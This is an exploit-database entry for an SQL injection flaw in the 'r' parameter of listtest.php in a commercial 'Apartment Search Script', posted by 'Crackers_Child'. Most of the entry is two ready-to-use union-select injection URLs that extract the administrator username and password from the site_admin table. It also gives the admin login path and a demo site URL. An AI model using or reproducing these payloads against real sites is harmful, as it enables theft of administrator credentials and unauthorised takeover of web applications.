Apartment Search Script (listtest.php r) SQL Injection Vulnerability

2008-04-19T00:00:00
ID 1337DAY-ID-2898
Type zdt
Reporter Crackers_Child
Modified 2008-04-19T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
Apartment Search Script (listtest.php r) SQL Injection Vulnerability
====================================================================



$ Script        : Apartment Search Script SQL Injection Vulnerability

$ Script Info   : http://www.yourfreeworld.com/script/apartment.asp

$ Script Price  : Only $79

$ Demo          : http://www.downlinegoldmine.com/apartment/

$ Author        : Crackers_Child

$ Note          : Erbabi ile vurulduysak sirtimizdan neyleyelim.Bir Yarali Kurt Misali

$ Note          : Her Yanimiz it Tuzagi . . .

$ Username Exp  : www.x.com/script_path/listtest.php?r=-1/**/union/**/select/**/1,admin%20from%20site_admin/*

$ Password Exp  : www.x.com/script_path/listtest.php?r=-1/**/union/**/select/**/1,password%20from%20site_admin/*

$ Admin Login   : /Site_Admin/ 



#  0day.today [2018-01-05]  #